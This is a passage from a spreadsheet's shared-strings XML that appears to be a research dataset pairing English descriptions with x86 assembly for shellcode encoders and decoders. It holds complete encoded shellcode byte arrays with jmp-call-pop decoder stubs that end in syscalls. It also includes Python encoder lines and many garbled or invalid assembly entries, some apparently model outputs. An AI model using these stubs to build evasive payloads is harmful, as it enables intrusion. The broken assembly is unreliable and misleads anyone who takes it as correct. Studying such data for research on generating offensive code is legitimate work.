    <t>encoded: dw 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539</t>
  </si>
  <si>
    <t>jmp short enc</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mul edx'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> 'xor edx , edx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov cx, [esi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> 'pop esi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>inc esi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov edi, esi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>push esi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov edi , esp'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> 'push esi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz call_decoded</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor ax, bx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz close'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor ax , bx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> 'xor ax , bx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>not word ax</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shr ax, cl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>not word ax'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> 'shr ax , cl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call [esp]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call_decoded:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call_decoded :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>enc:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bx , [esi]</t>
  </si>
  <si>
    <t>main :</t>
  </si>
  <si>
    <t>mov ax , [esi]</t>
  </si>
  <si>
    <t>mul edx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor edx , edx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov cx , [esi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pop cx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov edi , edi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jz decoded</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>shr ax , cl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">enc : </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>define the _start label and jump short to call_decoder</t>
  </si>
  <si>
    <t>decoder routine</t>
  </si>
  <si>
    <t>'mov eax , 19'</t>
  </si>
  <si>
    <t>store the pointer to the encoded shellcode in esi</t>
  </si>
  <si>
    <t>push the encoded shellcode pointer to stack</t>
  </si>
  <si>
    <t>push esi</t>
  </si>
  <si>
    <t>move the pointer to the shellcode into edi</t>
  </si>
  <si>
    <t>mov edi, esi</t>
  </si>
  <si>
    <t>decode routine</t>
  </si>
  <si>
    <t>perform xor between ax and 0x539 and store the result in ax</t>
  </si>
  <si>
    <t>xor ax, 0x539</t>
  </si>
  <si>
    <t>if zero jump to decoded_shellcode</t>
  </si>
  <si>
    <t>jz decoded_shellcode</t>
  </si>
  <si>
    <t>shift the ax register to right by one bit</t>
  </si>
  <si>
    <t>shr ax, 1</t>
  </si>
  <si>
    <t>subtract 13 from the ax register</t>
  </si>
  <si>
    <t>sub ax, 13</t>
  </si>
  <si>
    <t>point to the next word of the encoded shellcode</t>
  </si>
  <si>
    <t>inc esi \n inc esi</t>
  </si>
  <si>
    <t>goto the decode_pr to decode the next bytes</t>
  </si>
  <si>
    <t>jmp short decode_pr</t>
  </si>
  <si>
    <t>declare the decoded_shellcode label and call the stack</t>
  </si>
  <si>
    <t>define call_decoder and call decoder</t>
  </si>
  <si>
    <t>define encoded_shellcode as array of words 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539</t>
  </si>
  <si>
    <t>encoded_shellcode: dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539</t>
  </si>
  <si>
    <t>xor ecx, ecx</t>
  </si>
  <si>
    <t>encoded += '\\x%02x' % random . randint ( 1 , 7 )</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>nasm = str ( encoded ) . replace ( '\\x' , ',0x' )</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>lea edi , [esi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">xor ebx , ebx </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl , byte [esi+eax]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> cmp bl , 0xbb</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl , byte [esi+eax +1]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov byte [edi] , bl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>add al , 3</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded2P2 += '%02x, ' % x</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>lea edi , [esi+13]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov edx , esp</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov cl , 13</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl , byte [esi]</t>
  </si>
  <si>
    <t>mov bl , byte [esi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sub ebx , 1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov byte [bl] , edx+eax</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl , byte [edi]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encodedshellcode : db 0x32 , 0x51 , 0x30 , 0x74 , 0x69 , 0x63 , 0x6f , 0xe4 , 0x8a , 0x54 , 0xe2 , 0x0c , 0x81 , 0xc1 , 0x69 , 0x30 , 0x69 , 0x30 , 0x6a , 0x8a , 0x51 , 0xe3 , 0x8a , 0xb1 , 0xce</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded2 += '%02x, ' % x</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>lea edi , [esi+0x1]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov cl , 0x1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl , byte [esi+eax*1]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> mov edi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>add al , 0x2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded2 += '%02x, ' % y</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor ecx , ecx</t>
  </si>
  <si>
    <t>mov dl , 0x19</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> decode :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>0xeb , 0x0d , 0x5e , 0x31 , 0xc9 , 0xb1 , 0x19 , 0x80 , 0x36 , 0xaa , 0x46 , 0xe2 , 0xfa , 0xeb , 0x05 , 0xe8 , 0xee , 0xff , 0xff , 0xff , 0x9b , 0x6a , 0xfa , 0xc2 , 0x85 , 0x85 , 0xd9 , 0xc2 , 0xc2 , 0x85 , 0xc8 , 0xc3 , 0xc4 , 0x23 , 0x49 , 0xfa , 0x23 , 0x48 , 0xf9 , 0x23 , 0x4b , 0x1a , 0xa1 , 0x67 , 0x2a : db var1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded2 += '%02x, ' % ( y &amp; 0xff )</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encodedshellcode : db 0xeb , 0x0c , 0x5e , 0x31 , 0xc9 , 0xb1 , 0x19 , 0xf6 , 0x16 , 0x46 , 0xe2 , 0xfb , 0xeb , 0x05 , 0xe8 , 0xef , 0xff , 0xff , 0xff , 0xce , 0x3f , 0xaf , 0x97 , 0xd0 , 0xd0 , 0x8c , 0x97 , 0x97 , 0xd0 , 0x9d , 0x96 , 0x91 , 0x76 , 0x1c , 0xaf , 0x76 , 0x1d , 0xac , 0x76 , 0x1e , 0x4f , 0xf4 , 0x32 , 0x7f</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' % x</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' % new</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' % shift</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>encoded_shellcode += '%02x, ' % byte</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>original_shellcode += '%02x, ' % x</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp short call_decoder</t>
  </si>
  <si>
    <t>_start:</t>
  </si>
  <si>
    <t>_start :</t>
  </si>
  <si>
    <t>decoded_shellcode:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>dec call_decoder</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>format_0x += encoded_instruction_in_hex + ' , '</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>length_format_0x = format_0x . count ( ' , ' )</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">if '0x0aec, ' in format_0x : </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>define the _start label and jump short to call_shellcode</t>
  </si>
  <si>
    <t>define decoder</t>
  </si>
  <si>
    <t>zero out the loop counter and move shellcode_length in the first byte</t>
  </si>
  <si>
    <t>define check_even_odd</t>
  </si>
  <si>
    <t>check_even_odd:</t>
  </si>
  <si>
    <t>check_even_odd :</t>
  </si>
  <si>
    <t>jump to even_number is the contents in esi is even</t>
  </si>
  <si>
    <t>jle esi</t>
  </si>
  <si>
    <t>define odd_number</t>
  </si>
  <si>
    <t>odd_number:</t>
  </si>
  <si>
    <t>odd_number :</t>
  </si>
  <si>
    <t>left rotate the shellcode by one</t>
  </si>
  <si>
    <t>rol byte [esi], 0x1</t>
  </si>
  <si>
    <t>jump short to inc_dec</t>
  </si>
  <si>
    <t>jmp short inc_dec</t>
  </si>
  <si>
    <t>define even_number</t>
  </si>
  <si>
    <t>even_number:</t>
  </si>
  <si>
    <t>even_number :</t>
  </si>
  <si>
    <t>right rotate the shellcode in esi by one</t>
  </si>
  <si>
    <t>ror byte [esi], 0x1</t>
  </si>
  <si>
    <t>define inc_dec</t>
  </si>
  <si>
    <t>inc_dec:</t>
  </si>
  <si>
    <t>inc_dec :</t>
  </si>
  <si>
    <t>next byte in the encoded shellcode</t>
  </si>
  <si>
    <t>decrease the counter and jump to check_even_odd if not zero else jump short to shellcode</t>
  </si>
  <si>
    <t>define call_shellcode and call decoder function</t>
  </si>
  <si>
    <t>define shellcode as array of bytes 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01</t>
  </si>
  <si>
    <t>shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01</t>
  </si>
  <si>
    <t>'shellcode : db 0x62 , 0x60 , 0xa0 , 0x34 , 0x5e , 0x97 , 0xe6 , 0x34 , 0xd0 , 0x97 , 0xc4 , 0xb4 , 0xdc , 0xc4 , 0xc7 , 0x28 , 0x13 , 0x71 , 0xa6 , 0xc4 , 0xc3 , 0x58 , 0x16 , 0xe6 , 0x01'</t>
  </si>
  <si>
    <t>define shellcode_length equal to the size of shellcode</t>
  </si>
  <si>
    <t>shellcode_length equ $-shellcode</t>
  </si>
  <si>
    <t>jmp short call_shellcode</t>
  </si>
  <si>
    <t>mov cl, shellcode_length</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov cl , shellcode_length'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor shellcode_length , shellcode_length</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>je even_number</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>test esi, 01h</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> jmp short shellcode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>loop check_even_odd</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>define the _start label and jump short to stage</t>
  </si>
  <si>
    <t>store the shellcode in esi</t>
  </si>
  <si>
    <t>move the byte in esi into al</t>
  </si>
  <si>
    <t>mov al, byte [esi]</t>
  </si>
  <si>
    <t>'mov al , byte esi'</t>
  </si>
  <si>
    <t>clear ecx register</t>
  </si>
  <si>
    <t>'xor ecx , ecx'</t>
  </si>
  <si>
    <t>move the byte at the address in [esi+ecx+1] in bl and subtract 0x7 from bl</t>
  </si>
  <si>
    <t>'mov byte [esi+3] , 0x7'</t>
  </si>
  <si>
    <t>move bl into the byte in esi+ecx</t>
  </si>
  <si>
    <t>mov byte [esi+ecx], bl</t>
  </si>
  <si>
    <t>point to the next position in ecx</t>
  </si>
  <si>
    <t>inc ecx</t>
  </si>
  <si>
    <t>jump short to decode if al is not equal to cl else jump to shellcode</t>
  </si>
  <si>
    <t>define stage and call decoder function</t>
  </si>
  <si>
    <t>global decoder</t>
  </si>
  <si>
    <t>define shellcode as array of bytes 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87</t>
  </si>
  <si>
    <t>shellcode: db 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87</t>
  </si>
  <si>
    <t>'shellcode : db 0x18 , 0x38 , 0xc7 , 0x57 , 0x6f , 0x36 , 0x36 , 0x7a , 0x6f , 0x6f , 0x36 , 0x69 , 0x70 , 0x75 , 0x90 , 0xea , 0x38 , 0xd0 , 0x90 , 0xd1 , 0x71 , 0x12 , 0x5f , 0xd4 , 0x87'</t>
  </si>
  <si>
    <t>mov al , byte [esi]</t>
  </si>
  <si>
    <t>mov esi+ecx+1 , byte [esi+1]</t>
  </si>
  <si>
    <t>mov byte [esi+ecx] , bl</t>
  </si>
  <si>
    <t>shellcode : db 0x18 , 0x38 , 0xc7 , 0x57 , 0x6f , 0x36 , 0x36 , 0x7a , 0x6f , 0x6f , 0x36 , 0x69 , 0x70 , 0x75 , 0x90 , 0xea , 0x38 , 0xd0 , 0x90 , 0xd1 , 0x71 , 0x12 , 0x5f , 0xd4 , 0x87</t>
  </si>
  <si>
    <t>jmp short stage</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp short esp</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sub bl, 0x7</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov bl, byte [esi+ecx+1]</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">cmp al, cl </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jnz short decode</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jne short decode</t>
  </si>
  <si>
    <t>stage:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>define the _start label and jump to call_decoder</t>
  </si>
  <si>
    <t>in the decoder routine save the shellcode in esi</t>
  </si>
  <si>
    <t>clear the counter and move 0x1e into the first byte of the register</t>
  </si>
  <si>
    <t>in the decode function jump to lowbound label if the current byte of the shellcode is lower than 0x7 else subtract 0x7 from the byte of the shellcode and jump to common_commands</t>
  </si>
  <si>
    <t>lowbound label</t>
  </si>
  <si>
    <t>lowbound:</t>
  </si>
  <si>
    <t>clear the ebx and edx registers</t>
  </si>
  <si>
    <t>move 0x7 to bl</t>
  </si>
  <si>
    <t>mov bl, 0x7</t>
  </si>
  <si>
    <t>move 0xff to dl</t>
  </si>
  <si>
    <t>mov dl, 0xff</t>
  </si>
  <si>
    <t>increment dx by one</t>
  </si>
  <si>
    <t>inc dx</t>
  </si>
  <si>
    <t>subtract the current byte of the shellcode from bl</t>
  </si>
  <si>
    <t>sub bl, byte [esi]</t>
  </si>
  <si>
    <t>subtract bx from dx</t>
  </si>
  <si>
    <t>sub dx, bx</t>
  </si>
  <si>
    <t>move dl into the byte in esi</t>
  </si>
  <si>
    <t>mov byte [esi], dl</t>
  </si>
  <si>
    <t>in common_commands point to the next byte in esi</t>
  </si>
  <si>
    <t>decrement the counter and jump to decode routine if it is not zero else jump to shellcode label</t>
  </si>
  <si>
    <t>in the function call_decoder call the decoder routine and define shellcode as array of bytes 0xeb,0x25,0x5e,0x31,0xc9,0xb1,0x1e,0x80,0x3e,0x07,0x7c,0x05,0x80,0x2e,0x07,0xeb,0x11,0x31,0xdb,0x31,0xd2,0xb3,0x07,0xb2,0xff,0x66,0x42,0x2a,0x1e,0x66,0x29,0xda,0x88,0x16,0x46,0xe2,0xe2,0xeb,0x05,0xe8,0xd6,0xff,0xff,0xff,0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87</t>
  </si>
  <si>
    <t>lowbound :</t>
  </si>
  <si>
    <t>'mov bl , 0x7'</t>
  </si>
  <si>
    <t>'mov dl , 0xff'</t>
  </si>
  <si>
    <t>'sub dx , bx'</t>
  </si>
  <si>
    <t>'mov byte [esi] , dl'</t>
  </si>
  <si>
    <t>common_commands : inc esi</t>
  </si>
  <si>
    <t>mov bl , 0x7</t>
  </si>
  <si>
    <t>mov dl , 0xff</t>
  </si>
  <si>
    <t>sub bl , byte [esi]</t>
  </si>
  <si>
    <t>sub dx , bx</t>
  </si>
  <si>
    <t>mov byte [esi] , dl</t>
  </si>
  <si>
    <t>mov cl, 0x1e</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov cl , 0x1e'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor 0x1e , 0x1e</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>mov cl , var1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cmp byte [esi], 0x7</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jl lowbound</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp common_commands</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sub byte [esi], 0x7</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">cmp byte [esi] , 0x7 </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp 0x7</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>sub byte [esi] , 0x7</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>jmp var6</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>xor edx, edx</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>common_commands:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>common_commands : inc esi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>loop decode</t>
  </si>
  <si>
    <t>shellcode: db 0xeb,0x25,0x5e,0x31,0xc9,0xb1,0x1e,0x80,0x3e,0x07,0x7c,0x05,0x80,0x2e,0x07,0xeb,0x11,0x31,0xdb,0x31,0xd2,0xb3,0x07,0xb2,0xff,0x66,0x42,0x2a,0x1e,0x66,0x29,0xda,0x88,0x16,0x46,0xe2,0xe2,0xeb,0x05,0xe8,0xd6,0xff,0xff,0xff,0x38,0xc7,0x57,0x6f,0x69,0x68,0x7a,0x6f,0x6f,0x69,0x70,0x75,0x36,0x6f,0x36,0x36,0x36,0x36,0x90,0xea,0x57,0x90,0xe9,0x5a,0x90,0xe8,0xb7,0x12,0xd4,0x87</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>call [decoder] , 0xeb , 0x25 , 0x5e , 0x31 , 0xc9 , 0xb1 , 0x1e , 0x80 , 0x3e , 0x07 , 0x7c , 0x05 , 0x80 , 0x2e , 0x07 , 0xeb , 0x11 , 0x31 , 0xdb , 0x31 , 0xd2 , 0xb3 , 0x07 , 0xb2 , 0xff , 0x66 , 0x42 , 0x2a , 0x1e , 0x66 , 0x29 , 0xda , 0x88 , 0x16 , 0x46 , 0xe2 , 0xe2 , 0xeb , 0x05 , 0xe8 , 0xd6 , 0xff , 0xff , 0xff , 0x38 , 0xc7 , 0x57 , 0x6f , 0x69 , 0x68 , 0x7a , 0x6f , 0x6f , 0x69 , 0x70 , 0x75 , 0x36 , 0x6f , 0x36 , 0x36 , 0x36 , 0x36 , 0x90 , 0xea , 0x57 , 0x90 , 0xe9 , 0x5a , 0x90 , 0xe8 , 0xb7 , 0x12 , 0xd4 , 0x87'</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cmp byte [0xeb , 0x25 , 0x5e , 0x31 , 0xc9 , 0xb1 , 0x1e , 0x80 , 0x3e , 0x07 , 0x7c , 0x05 , 0x80 , 0x2e , 0x07 , 0xeb , 0x11 , 0x31 , 0xdb , 0x31 , 0xd2 , 0xb3 , 0x07 , 0xb2 , 0xff , 0x66 , 0x42 , 0x2a , 0x1e , 0x66 , 0x29 , 0xda , 0x88 , 0x16 , 0x46 , 0xe2 , 0xe2 , 0xeb , 0x05 , 0xe8 , 0xd6 , 0xff , 0xff , 0xff , 0x38 , 0xc7 , 0x57 , 0x6f , 0x69 , 0x68 , 0x7a , 0x6f , 0x6f , 0x69 , 0x70 , 0x75 , 0x36 , 0x6f , 0x36 , 0x36 , 0x36 , 0x36 , 0x90 , 0xea , 0x57 , 0x90 , 0xe9 , 0x5a , 0x90 , 0xe8 , 0xb7 , 0x12 , 0xd4 , 0x87] , 0x5f</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>in decoder save the shellcode in esi and move it to edi</t>
  </si>
  <si>
    <t>in decode move the current byte of the shellcode in the bl register</t>
  </si>
  <si>
    <t>perform the xor between bl and 0xbb and jump to formatting if it is zero else move the byte of the shellcode in cl</t>
  </si>
  <si>
    <t>perform xor between cl and 0xaa and jump to shift decode if the result is zero</t>
  </si>
  <si>
    <t>point to the next byte of the shellcode and jump short to decode</t>
  </si>
  <si>
    <t>define shift_decode routine</t>
  </si>
  <si>
    <t>shift_decode:</t>
  </si>
  <si>
    <t>shift_decode :</t>
  </si>
  <si>
    <t>move the contents of the address esi+1 into dl</t>
  </si>
  <si>
    <t>mov dl, byte [esi + 1]</t>
  </si>
  <si>
    <t>shift right dl by 1</t>
  </si>
  <si>
    <t>shr dl, 1</t>
  </si>
  <si>
    <t>move dl into the byte in esi+1</t>
  </si>
  <si>
    <t>mov byte [esi + 1], dl</t>
  </si>
  <si>
    <t>point to the next byte of the shellcode</t>
  </si>
  <si>
    <t>jump short to decode</t>
  </si>
  <si>
    <t>formatting label</t>
  </si>
  <si>
    <t>formatting:</t>
  </si>
  <si>
    <t>formatting :</t>
  </si>
  <si>
    <t>move edi to eax</t>
  </si>
  <si>
    <t>mov eax, edi</t>
  </si>
  <si>
    <t>move the byte in eax to bl</t>
  </si>
  <si>
    <t>mov bl, byte [eax]</t>
  </si>
  <si>
    <t>perform xor between bl and 0xbb and jump to encoded if the result is zero</t>
  </si>
  <si>
    <t>define format routine</t>
  </si>
  <si>
    <t>format:</t>
  </si>
  <si>
    <t>format :</t>
  </si>
  <si>
    <t>move the byte in eax to cl</t>
  </si>
  <si>
    <t>mov cl, byte [eax]</t>
  </si>
  <si>
    <t>perform xor between cl and 0xaa and jump to next_cycle if the result is not zero</t>
  </si>
  <si>
    <t>define cycle</t>
  </si>
  <si>
    <t>cycle:</t>
  </si>
  <si>
    <t>cycle :</t>
  </si>
  <si>
    <t>move the byte at address eax to dl</t>
  </si>
  <si>
    <t>mov dl, byte [eax]</t>
  </si>
  <si>
    <t>perform xor between dl and 0xbb and jump to next_cycle if the result is zero</t>
  </si>
  <si>
    <t>move the byte at address eax+1 to dl</t>
  </si>
  <si>
    <t>mov dl, byte [eax + 1]</t>
  </si>
  <si>
    <t>move dl to the byte pointed by the contents of eax</t>
  </si>
  <si>
    <t>mov byte [eax], dl</t>
  </si>
  <si>
    <t>jump short to cycle</t>
  </si>
  <si>
    <t>in next_cycle increment edi by one and jump short to formatting</t>
  </si>
  <si>
    <t>in call_shellcode call the decoder function</t>
  </si>
  <si>
    <t>encoded is the array of bytes 0xaa,0x62,0xc0,0xaa,0xa0,0xaa,0xd0,0xaa,0x5e,0xaa,0x5e,0xaa,0xe6,0xaa,0xd0,0xaa,0xd0,0xaa,0x5e,0xaa,0xc4,0xaa,0xd2,0xaa,0xdc,0x89,0xe3,0xaa,0xa0,0x89,0xe2,0xaa,0xa6,0x89,0xe1,0xb0,0xaa,0x16,0xcd,0x80,0xbb</t>
  </si>
  <si>
    <t>encoded: db 0xaa,0x62,0xc0,0xaa,0xa0,0xaa,0xd0,0xaa,0x5e,0xaa,0x5e,0xaa,0xe6,0xaa,0xd0,0xaa,0xd0,0xaa,0x5e,0xaa,0xc4,0xaa,0xd2,0xaa,0xdc,0x89,0xe3,0xaa,0xa0,0x89,0xe2,0xaa,0xa6,0x89,0xe1,0xb0,0xaa,0x16,0xcd,0x80,0xbb</t>
  </si>
  <si>
    <t>mov dl , [esi+1]</t>
  </si>
  <si>
    <t>shr dl , 1</t>
  </si>
  <si>
    <t>mov eax , edi</t>
  </si>
  <si>
    <t>mov bl , byte [eax]</t>
  </si>
  <si>
    <t>mov cl , byte [eax]</t>
  </si>
  <si>
    <t>mov dl , byte [eax]</t>
  </si>
  <si>
    <t>mov dl , byte [eax+1]</t>
  </si>
  <si>
    <t>mov byte [eax] , dl</t>
  </si>
  <si>
    <t>0xaa , 0x62 , 0xc0 , 0xaa , 0xa0 , 0xaa , 0xd0 , 0xaa , 0x5e , 0xaa , 0x5e , 0xaa , 0xe6 , 0xaa , 0xd0 , 0xaa , 0xd0 , 0xaa , 0x5e , 0xaa , 0xc4 , 0xaa , 0xd2 , 0xaa , 0xdc , 0x89 , 0xe3 , 0xaa , 0xa0 , 0x89 , 0xe2 , 0xaa , 0xa6 , 0x89 , 0xe1 , 0xb0 , 0xaa , 0x16 , 0xcd , 0x80 , 0xbb : db var1</t>
  </si>
  <si>
    <t xml:space="preserve">pop esi </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>esi :</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
